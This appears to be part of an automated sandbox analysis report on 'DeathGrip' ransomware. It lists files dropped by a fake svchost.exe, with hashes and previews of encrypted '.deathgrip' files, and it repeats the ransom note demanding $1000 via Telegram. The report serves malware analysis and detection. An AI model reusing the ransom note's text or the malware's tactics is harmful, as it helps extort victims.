                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.973483024535585
                                                          Encrypted:false
                                                          SSDEEP:192:hCjKrCiIKJharXXyT6bLFmqUv2yWzWvQOkrovYvSgSVniX6:EjKrNImhpoItvlWqIfrovYqgMiX6
                                                          MD5:CA780D6E10ECB8DDDC2139AD3B448278
                                                          SHA1:3AE48B040995FEED2DC0684CAB8A11489EBC0CBE
                                                          SHA-256:68AB9AF83CBE482E11DD7E2564923994BEADC17EBB5DAD4C66860C24B6FC5F12
                                                          SHA-512:34F188F738E0E01F200D2CD72EDDCC029044F60D02300AEBC425EB89D42469590B00AF4CD837152440505BBBCC8F1320293E0A93AA279DDB28BFD1738F7A9562
                                                          Malicious:false
                                                          Preview:.........;(...(.Bdp).>.......7..X/%.8.......#@...%....D...4..l.{...x....J.D....)G.e1....(...j..J..N..4.o..`...9....._d.z/>..D.:h4=.s.2....l....J..V......8.."..LGX.r)...).L3.E..R....G..Y.}.*.SQ..hZ....[.a....".&.Mp.........l.K.3.m.(.*"TlX$......s.@.CB{.o.......I.z.|,.3u.....6..e..b'U.[v..U.)...F<...~..xH....~$.\.u?.'....t#+..R.....z......SM]jX..M.1;....`zp-_..%..).w)..`.W.V.....Dv..1.Tn.0.{U.||d..c,....n....6.....Tf..@{s...R..M..T..n.U..x.J.....5.}..W?[..1.iQ%...I....E..J6..T..O.Q.-....#.e...1..rT.\.6u..D..M.m..R. ........S.Ou...t..\}.0+..U....S.W`...@.JTC.....^G.N...F...0x.4........B.m......K....-.P1E.S..`.7..).....L.{.r.Z!.$P.Z..m5&.....i.n....+7g.@.....g...{......H..L.Q..>&5..1....LU.>.,.l.0..fX...S.q|k..G.r.......e$Y/......s..B..M.)r.>.[.....qT....G.NL..kW.....}.r......1v...+m....O..?B5".vh....{_...E6..O<$.{....!.....?....{..;|.-.I.m.8>......`....h...3..Xri.q.W.N.CB...;....fu.Q. .-#y.R....cln..+...d...F.....p...v...]...;s.Z..J6S....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\3HS1BX64\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\NYEH7TCM\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\Q1YRMQIR\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-bundle-3a99f64809c6780df035[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):702576
                                                          Entropy (8bit):7.999733197870426
                                                          Encrypted:true
                                                          SSDEEP:12288:bROrnDKxGjyudA9kswYcgSPS31otLyhhYNm6CLrSlxK6xLf1zkRn1QRf2Iru:lqDFj3dA1wBW2tfNQLK/5f1Ql1WS
                                                          MD5:CFFD5372EFB8B50E489849FFE884E09D
                                                          SHA1:9358796B5625F58195F3652200F87A4CE5D2A071
                                                          SHA-256:BB3A58B5C59391D5011FC495E5C48775B01CD4F5326EB613BE46F4D1DC78413C
                                                          SHA-512:05C064EDA56F6EC88BB116300980E4A7E62950EAFF35A7F7DE727E58D9F0BF0F73F2D3ADF8B7C2370750A77178D90979219970DCDF6AFC1C0CDEA128D3851B94
                                                          Malicious:true
                                                          Preview:.............h:.!]..a..V\%..._. C..F8.=..8.j0x.q......3...5L.....,.tT7.E\.j.w.k.d7z...B.)......>T...0.Q.j}<......<J.._.8o%..3._...2Gt..qS8..N.9(....|./.+..N...&l...N.D... ..C..Al....t.I...2.f:.~Q...T..t..f....-.#h$.UCY)..."e..t*.l...)....z..'.\.l.k.U...5..|.~...8....L|.Z..yv}"..s:...%...P...)a;...]./&.SP..o...4.SinT...V?...].YH`Y....X.......|y..3.I.../Fx.....\.2...%...(..V...S...O...;1[9.".;z......)....c.....n....Fi=...#....V.....Lm..2.^j.+:..`A....V+..]4-]m...V.`...Zw.?...r...!>}e...~"!..f..^X!b.E..Xe.x.:[.h.b...Z....j..E... Z....\$(.U..1.k...YhD..2.e.....'p...... ...s1?...1......B....hD...]....J_.={..LUu......_0..W9....... ..!E..V...(...;......2..8_[..gi.~.>.a..r...[...@ry..;.Z..v.-Z.[X.c+1..D,]_+n..,...cA....|.1.<S..".42e.A.*..W..rr......=. ...p..&..@.[.......M..ts....)v..*.2(.......u........x..&...T8.c..3\m.V.........MTt5.x6..`..t1QAm?..++.j..3..^.q.F.......V..f...vgA..x..|...H.j310..|..N.6....7.7B..[.E.|6.K.A...!...a..l..F.......'....O..d.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21120
                                                          Entropy (8bit):7.990201834382696
                                                          Encrypted:true
                                                          SSDEEP:384:ziyxqWfhq5AARSqj3TU2Vrm17w71C8Ma8zQwEzb4mo7plT1W70hvf60MHOUz6:2y1hEHoSXw1EE3a8cR477fpXp6rHl6
                                                          MD5:65D1060572715D824D52884F698049D6
                                                          SHA1:C787C83BFA69EFC9E01BB144B9CBFF77F3B93D24
                                                          SHA-256:6BE5BFD171DD958A0B8653EFD57C79425FEA16D42F0E87EB5976F6542ED1B89B
                                                          SHA-512:9E0B49288056BBD956AF966C243B26B4C6C711022963404797578CD5132F7E335CA5A10EAE6841FD3426B786A93246F9B0A8C56BA56C096F6D41E6789C3DBFD6
                                                          Malicious:true
                                                          Preview:........U.....q7a.p......(....janB).....9...w..2...:RH.n\..&P.0..k.%....^9X`!.1.rQ.L....m.%.rn....H@....8..].c....v>....[.3..%5..iom..K>y...../..L..FQ..Z}..I.m}.Qt...,........b.~.[....H....j.&..IU....u9.".8..........(t..-.f..N....R..G...&7.HE.%....HyHN.!..=@..;.D....`...0%D.j..<Y..{..4"...9!.../...a...X..9v.?..S<e........_.. .;..f......R.'*cf.b..d}.....K..Yz....D-.<.....A.j{.e-.=y....g.7...Vp.......;RH....H..}v.L7O.-.,k. ...'..._.E....OLW>../G.Xlh=....O]...OW.r..@...$.....0F....Z4+.xJN...^s.."}.....,Ln...P..(I.'.J.O..ou%.2g..*$....H:."G.......O..~.r....r:..9.j.....7.kFP.....o...Z.{j_%.I.....v7c.7.#.;Gg"...l\....O....f.-.7......../..>..\/H..!....@.....s.?.D..xV.Cq&...A.........W..d....t.K......A]..."....g.... .3.AQ.pTj..xi..etK6.;q..P...{..s$.i.w{:D\^..7..QRn47.,.j..lB../.....,..j.=4k.........QQN.8..w.9..l..[.M....K..)..4..P..y.B.......Bs..q...mx l^..O..)4..c........j.-D..N..V1....(}..uL?S..Lr{FA.p....X..9TJU...Q..S......../..a..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\staticpwascripts-30998bff8f[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\staticpwascripts-30998bff8f[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18928
                                                          Entropy (8bit):7.989098870036827
                                                          Encrypted:false
                                                          SSDEEP:384:QlDPfVTtA3DWES7l+8RbD40NVNxJeq38Y+s0KO5mqFw85mOwgZnDAnHWcy1uuUhA:QNPtTtA3jO+ug0zfwQ30KKK8x34FVhvY
                                                          MD5:AA07AB1390DB24E71F52328FAF292896
                                                          SHA1:314134492F4908CB066A5CFE00D5DFEEC7A9BFA7
                                                          SHA-256:4AF955EE467B832D33D0D702BDBBDEC7FBDB4E20C20D8AF73E980AAEF2157075
                                                          SHA-512:7BB8C02D9BA2D3B772BD88BD527E1A2D78251D95ED8A0E3F43F8843822DA7CAB1A753F386C2E03B681F74BC2CB2BCA5A8DB67EBCAA96CF5E73F088B73A7BD003
                                                          Malicious:false
                                                          Preview:.........._c..{ .Y.._.P(.q..O..d..W..;_^.H1_...iMQ.Yo.Q.X....6.^..1.g!=.......y2=T#%.w..{.........-8...oV..C.Y....K._.\.m.Yp.lRK.i..sd...*.....YCF.:...m..q......'....l.. ..)..H.(..}.*M4.........-.g...'.j....s../.h.........v..-..H..;....VJ././.=TK.!..Te...4...W..@l_...?...TKM....pH..g...I.J...".....^.-.1.T.l..h....k..S.|8V.k..`....)....~p.^.K.9(u....).@..p..K..|9..M..^.Q...sH.(./..;..*.O.>7s'..Iy,.^...;Jl..I..r<n...oS.~S..XN.991L.f...H..5....MS..N..;...X...u.9...6..L....G%vVDp.....[Q..l-..@y.wQ`.fZ..u...d....H..PP7...Q.RS..A.........@]:y...O.^.Ep.......2.qO?.#..;W....>.....S...../..A|......].....M...-..5X....e.^w.m..sq..z......(8./.#d.............&.D.....a .%.....v..s)X.?...i.8!x..s#!../.b..{.5.Xi.](. ..w.'.,.J.).A.8..48.... ,L....F....$]..g.N.i*Q......1U.!..J..f.J..-!mK.,.....&.T..P3.{.a]e.k...z.<No...a.i.E...y.r,J.>...1ix;/....wl...u2........$..&LV..{:...).X.-.....F.0.f.....o...B...q...aU.v....r..'.RjjQ &d........wt%..Q.8C

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCookies\ESE\container.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCookies\ESE\container.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.143468201285884
                                                          Encrypted:false
                                                          SSDEEP:6:gyrVDVJGDXteohtYfdD2RqfEjrNNPUJBqlkFEcWzIzUgq9KQ8AmzdQNLKuSfRsaK:/DVJq9egYazPUpFKzNRKtAMG9KDsaK
                                                          MD5:20C094F68A6A9D531BFE54BE1E342F5F
                                                          SHA1:86FABA84CA57393D55E263F91F7A0CF3272521C1
                                                          SHA-256:565AC8327B812C2AFCADB596083A54ED9813F12C7E2D5B6AEC790F0FCBEC25D1
                                                          SHA-512:A864520ADB6199711AEA3980230F93B0D5504963D06447AC5CAFD5FB5F3C009C080265D9569A9251995EA41569E97627F371FB047A62535B106FDE632E08D132
                                                          Malicious:false
                                                          Preview:.........>.......;O..]^SLGUvgAdW8PS2fIEpLs+R5qdYb+DITt4rGzN16RPyAaveO+S6oP27iSwFcKJQih9CpXL9L0HAv5pxi3YXsuPlECBtO4rIUlFhw566z8fZm65JBQLYS8ONnamsvfTHh89plq28CJSUaDMQzrxJdHLcKM3fuYCVH2W9l/OWwMCcFRq7KdRKKJQISC9B157qG79cyreyx+9cMKkfyyzFDYUT8LKLvAA52knpaYuB3ZV37PbEPv3QcfDojemahqltCid3vAQ8It0YQUxRVORhze0iREjzEoOnFiILxMAk1VIvhiXsPHC5pdLgXhqoP/waVap7NjChg9I9e7rKVWsrXiOexw==

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCookies\ESE\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\Internet Explorer\DOMStore\YRTPYF2G\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\Internet Explorer\DOMStore\YRTPYF2G\www.office[1].xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
